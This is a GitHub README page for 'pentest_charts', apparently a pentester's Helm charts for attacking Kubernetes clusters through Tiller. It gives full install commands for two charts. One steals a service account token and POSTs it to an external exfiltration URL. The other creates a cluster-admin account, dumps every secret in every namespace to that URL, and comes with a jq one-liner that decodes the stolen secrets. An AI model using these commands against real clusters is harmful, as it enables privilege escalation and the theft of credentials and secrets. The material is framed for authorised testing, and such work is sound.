Skip to content

ropnop/pentest_charts

master
Switch branches/tags

Name already in use

A tag already exists with the provided branch name. Many Git commands accept both tag and branch names, so creating this branch may cause unexpected behavior. Are you sure you want to create this branch?
1 branch 0 tags
Code

Latest commit

 

Git stats

Files

Permalink
Failed to load latest commit information.
Type
Name
Latest commit message
Commit time
charts
 
 
docs
 
 
README.md
 
 
About Charts exfil_sa exfil_secrets

README.md

About

These are a few Helm Charts I've made to help exfiltrate data or privesc when you're in a Kubernetes Cluster and have access to Tiller, but not to the Kubernetes API.

For more information, see my blogpost about attacking Tiller from inside a cluster: https://blog.ropnop.com/attacking-default-installs-of-helm-on-kubernetes/

Charts

To use these charts, you must first initialize Helm, then you can install the charts directly from the repo:

$ helm init --client-only
$ helm install --repo https://ropnop.github.io/pentest_charts/ <chart_name> [options]

exfil_sa

This chart deploys a job designed to simply POST the pod's service account token to a URL. This is useful if you have access to Tiller and know a specific service account who's token you'd like to steal. It takes the following values:

  • name - the name of the release, job and pod.
  • serviceAccountName - the service account to use (and therefore the token that will be exfil'd)
  • exfilURL - the URL to POST the token to. Make sure you have a listener on that URL to catch it! (I like using a serverless function)
  • namespace - defaults to kube-system, but you can override it

Usage:

helm install --name tiller-deployer --set serviceAccountName=tiller --set exfilURL="https://datadump-slack-dgjttxnxkc.now.sh" --repo https://ropnop.github.io/pentest_charts exfil_sa_token

This will POST the token in the body of an HTTP request to exfilURL.

To clean up: helm delete --purge <release_name>

exfil_secrets

This chart creates a new service account with cluster-admin privileges, then deploys a job with that new service account to read all the secrets in every namespace from the Kubernetes API and POST the data back to an exfilURL.

It takes the following values:

  • name - the name of the release, job and pod.
  • serviceAccountName - the service account to use (and therefore the token that will be exfil'd)
  • exfilURL - the URL to POST the token to. Make sure you have a listener on that URL to catch it! (I like using a serverless function)
  • namespace - defaults to kube-system, but you can override it

Usage:

helm install --name tiller-deployer --set serviceAccountName="tiller-deployer" --set exfilURL="https://datadump-slack-dgjttxnxkc.now.sh/all_secrets.json" --repo https://ropnop.github.io/pentest_charts exfil_secrets

This will POST every Kubernetes secret in JSON form to the exfilURL. To parse through and quickly decode all the secrets, you can use jq:

cat all_secrets.json| jq '[.items[] | . as $secret| .data | to_entries[] | {namespace: $secret.metadata.namespace, name: $secret.metadata.name, type: $secret.type, created: $secret.metadata.creationTimestamp, key: .key, value: .value|@base64d}]'

To clean up: helm delete --purge <release_name>

About

Some helpful Helm Charts for pentesters

Resources

Readme
Activity

Stars

38 stars

Watchers

3 watching

Forks

4 forks
Report repository

Releases

No releases published

Packages

No packages published

Languages